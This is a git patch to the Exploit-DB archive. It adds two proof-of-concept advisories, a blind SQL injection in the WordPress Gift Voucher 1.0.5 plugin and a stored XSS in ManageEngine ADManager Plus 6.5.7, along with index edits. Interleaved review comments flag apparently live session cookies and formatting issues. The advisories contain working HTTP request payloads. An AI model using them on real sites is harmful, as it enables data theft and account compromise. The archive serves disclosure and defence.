From aaa959b29cbfcace98d0ca55d9d4a9805538304c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 27 Aug 2018 05:01:54 +0000 Subject: [PATCH] DB: 2018-08-27 2 changes to exploits/shellcodes Apache James 2.2 - SMTP Denial of Service Apache James Server 2.2 - SMTP Denial of Service SSH2 3.0 - Restricted Shell Escaping Command Execution SSH2 3.0 - Restricted Shell Escape (Command Execution) WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting --- exploits/php/webapps/45255.txt | 38 +++++++++++++++++ exploits/windows_x86-64/webapps/45256.txt | 50 +++++++++++++++++++++++ files_exploits.csv | 6 ++- 3 files changed, 92 insertions(+), 2 deletions(-) create mode 100644 exploits/php/webapps/45255.txt create mode 100644 exploits/windows_x86-64/webapps/45256.txt
diff --git a/exploits/php/webapps/45255.txt b/exploits/php/webapps/45255.txt
new file mode 100644
index 000000000..0b719cac8
--- /dev/null
+++ b/exploits/php/webapps/45255.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
+# Google Dork: intext:"/wp-content/plugins/gift-voucher/"
+# Date: 2018-08-23
+# Exploit Author: Renos Nikolaou
+# Software Link: https://wordpress.org/plugins/gift-voucher/
+# Vendor Homepage: http://www.codemenschen.at/
+# Version: 1.0.5
+# Tested on: Windows 10
+# CVE: N/A
+# Description : The vulnerability allows an attacker to inject sql commands
+# on 'template_id' parameter.
+
+# PoC - Blind SQLi :
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: domain.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://domain.com/gift-voucher/
+Content-Length: 62
+Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23
+Connection: close
+
+action=wpgv_doajax_front_template&template_id=1 and sleep(15)#
+
+Parameter: template_id (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448
+ Vector: AND [INFERENCE]
+---
+web application technology: Apache
+back-end DBMS: MySQL >= 5.0.0
+banner: '5.5.59'
\ No newline at end of file
diff --git a/exploits/windows_x86-64/webapps/45256.txt b/exploits/windows_x86-64/webapps/45256.txt
new file mode 100644
index 000000000..dafd62436
--- /dev/null
+++ b/exploits/windows_x86-64/webapps/45256.txt
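Review bot: The `Cookie:` header of the PoC request still carries what appear to be live session identifiers (`PHPSESSID`, `__stripe_mid`, `__stripe_sid`) even though the host has already been anonymised to `domain.com`; they are not needed to demonstrate the issue and should be masked to placeholders before publication, since they may still identify a real account on the tested site. The `# Description` lines are also thinner than the sqlmap excerpt that follows: they name the parameter but not the handler, whereas the request body shows the injection point is the `template_id` value consumed by the `wpgv_doajax_front_template` admin-ajax action, which is what a maintainer needs in order to locate the unparameterised query. A remediation line such as `# Fix: cast template_id to an integer and build the query through $wpdb->prepare()` would let defenders act on the advisory without re-deriving it.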
@@ -0,0 +1,50 @@
+# Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
+# Date: 2018-08-21
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.manageengine.com/
+# Hardware Link : https://www.manageengine.com/products/ad-manager/
+# Software : ZOHO Corp ManageEngine ADManager Plus
+# Product Version: 6.5.7
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# CVE : N/A
+
+# Zoho ManageEngine ADManager Plus 6.5.7 allows XSS on the "Workflow Delegation" "Requesters" screen.
+
+# HTTP Request Header :
+
+Request URL: http://TARGET:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
+Request Method: POST
+Status Code: 200 OK
+Remote Address: TARGET:8080
+Referrer Policy: no-referrer-when-downgrade
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Length: 320
+Content-type: application/x-www-form-urlencoded;charset=UTF-8
+Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=3CED862790101335DD0EB05EE42E4972; JSESSIONIDSSO=3E6785DB8D6DFD46D6C729579E68418D
+Host: TARGET:8080
+Origin: http://TARGET:8080
+Referer: http://TARGET:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
+X-Requested-With: XMLHttpRequest
+
+# HTTP Response Header :
+
+Content-Length: 3753
+Content-Type: text/html;charset=UTF-8
+Date: Tue, 14 Aug 2018 10:14:32 GMT
+Server: Apache-Coyote/1.1
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1
+
+# Query String Parameters :
+
+methodToCall: listTechnicianRows
+
+# Form Data :
+
+params: {"startIndex":1,"range":10,"searchText":"\">","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
+adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b04c64838..e1b0d535a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3569,7 +3569,7 @@ id,file,description,date,author,type,platform,port
 27903,exploits/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,dos,linux,
 27906,exploits/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",dos,windows,
 27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Remote Buffer Overflow",2006-05-29,kcope,dos,windows,
-27915,exploits/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple,
+27915,exploits/multiple/dos/27915.pl,"Apache James Server 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple,
 27925,exploits/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",dos,linux,
 27930,exploits/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC)",2006-05-31,Mr.Niega,dos,windows,
 27942,exploits/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",dos,hardware,
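Review bot: The advisory is labelled `Stored XSS`, but the hunk shows only the submission request and its response headers; it never shows the page or response in which the `searchText` value `\">` is rendered unescaped, so a reader cannot verify the stored (rather than reflected) claim or identify the affected view from this file alone, and a line naming where the injected requester text is later displayed would close that gap. The `Cookie:` line also carries what appear to be real `JSESSIONID`, `JSESSIONIDSSO` and `adscsrf` values even though the host has already been replaced with `TARGET`; they should be masked to placeholders to match. The header fields `Vulernability Type` and `Vulenrability` are misspelled and `Hardware Link` is used for a software product page, so `# Vulnerability Type : Cross-site Scripting`, `# Vulnerability : Stored XSS` and `# Software Link :` would bring the header in line with the format used by 45255 in this same commit.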
@@ -8286,7 +8286,7 @@ id,file,description,date,author,type,platform,port
 21362,exploits/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",local,linux,
 21373,exploits/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection",2002-04-11,"Przemyslaw Frasunek",local,openbsd,
 21375,exploits/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",local,linux,
-21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,local,linux,
+21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escape (Command Execution)",2002-04-18,A.Dimitrov,local,linux,
 21407,exploits/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,local,bsd,
 21408,exploits/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,local,unix,
 21414,exploits/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Local Buffer Overflow",2002-04-23,"Gobbles Security",local,unix,
@@ -39856,3 +39856,5 @@ id,file,description,date,author,type,platform,port
 45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,
 45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php,
 45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,
+45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,
+45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,
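Review bot: The new row for 45256 files the ManageEngine ADManager Plus XSS under `exploits/windows_x86-64/webapps/` with platform `windows_x86-64`, while the context row just above it for the same product, version and author (45254, HTML Injection) uses `exploits/windows/webapps/` and platform `windows`. Nothing in the 45256 advisory depends on a 64-bit build, so the two entries will be indexed under different platforms for no visible reason. Unless the split is intentional, `+45256,exploits/windows/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows,` together with the matching file path elsewhere in the commit would keep the two advisories together.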